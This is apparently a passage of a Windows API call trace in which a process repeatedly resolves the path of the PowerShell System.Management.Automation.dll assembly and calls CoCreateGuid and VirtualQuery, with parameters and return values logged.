	[0383.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.484] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x11ba9ed7, Data2=0x4af1, Data3=0x41ed, Data4=([0]=0xbe, [1]=0xed, [2]=0xf5, [3]=0xbe, [4]=0xc2, [5]=0x9f, [6]=0x18, [7]=0xba))) returned 0x0
	[0383.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.485] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xb40a7af9, Data2=0x5440, Data3=0x44e1, Data4=([0]=0x92, [1]=0xe0, [2]=0xd0, [3]=0x33, [4]=0x83, [5]=0xfa, [6]=0x7f, [7]=0x33))) returned 0x0
	[0383.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.486] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x6f7f84f4, Data2=0xf810, Data3=0x4d5a, Data4=([0]=0x9f, [1]=0xa7, [2]=0xf4, [3]=0x8a, [4]=0xae, [5]=0x2e, [6]=0x5c, [7]=0x54))) returned 0x0
	[0383.486] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa357cb7c, Data2=0xd2af, Data3=0x45a5, Data4=([0]=0x90, [1]=0xef, [2]=0x1, [3]=0x7e, [4]=0x12, [5]=0x2e, [6]=0x9b, [7]=0x54))) returned 0x0
	[0383.486] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x13df2549, Data2=0x3301, Data3=0x4c91, Data4=([0]=0xaf, [1]=0xd3, [2]=0xb3, [3]=0x50, [4]=0xa9, [5]=0x86, [6]=0xff, [7]=0xe9))) returned 0x0
	[0383.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.487] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x45d94776, Data2=0xfc2b, Data3=0x4ae7, Data4=([0]=0xb5, [1]=0xa, [2]=0x4b, [3]=0x4e, [4]=0x3d, [5]=0xb1, [6]=0x41, [7]=0xff))) returned 0x0
	[0383.487] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.487] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.488] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.488] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.488] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.489] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.489] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.490] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.490] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.491] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.491] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.492] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.492] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
